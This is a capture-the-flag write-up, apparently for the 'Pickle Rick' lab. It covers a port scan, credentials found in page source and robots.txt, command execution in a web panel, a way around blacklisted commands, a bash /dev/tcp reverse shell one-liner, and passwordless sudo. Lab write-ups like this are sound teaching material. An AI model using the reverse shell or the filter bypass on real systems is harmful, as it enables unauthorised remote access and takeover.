### Enumeration ``` Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:17 E. Africa Standard Time Nmap scan report for 10.10.170.149 Host is up (0.35s latency). Not shown: 98 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds ``` We got 2 ports up , 22 and 80 Opening up port 80 from the browser, and reading the source code I get : ```htmlembedded= <!-- Note to self, remember username! Username: R1ckRul3s --> ``` We have a username : R1ckRul3s , and viewing the `robots.txt` file I get something (a weird string) : `Wubbalubbadubdub` I assume that might be the password of the username or a path, but nope it's obviously not a path since it's giving 404 Not Found error. I now perform a directory search , to look for any file/folder that is available.  We get `login.php` , and that's look valid:) I use the username and password(I guess) that we found earlier , from comment and robots.txt to login: ``` username : R1ckRul3s password : Wubbalubbadubdub ``` ### FootHold I was able to Run commands after loggin in , as shown below!  Except trying to read a file using `cat` I was receiving a weird GIF , that insulted my skills:  Basically it has some commands that are blacklisted , but we can still read the files, I hope! Using `grep . <filename>` I was able to read the files. I now grab my revshell , I first check if `nc` or `netcat` is in the system , and luckily it is in the system:  but despite it being there it doesn't actually seem to execute / work. with `bash -c "bash -i &>/dev/tcp/<ip>/<port> <&1"` I was able to get a reverse shell and the second ingredient was in `/home/rick` and the third ingredient was in `/root/` ### PRIVESC Running `sudo -l` I was able to see that I have permission to run as sudo in the whole system without having to enter a password:  ---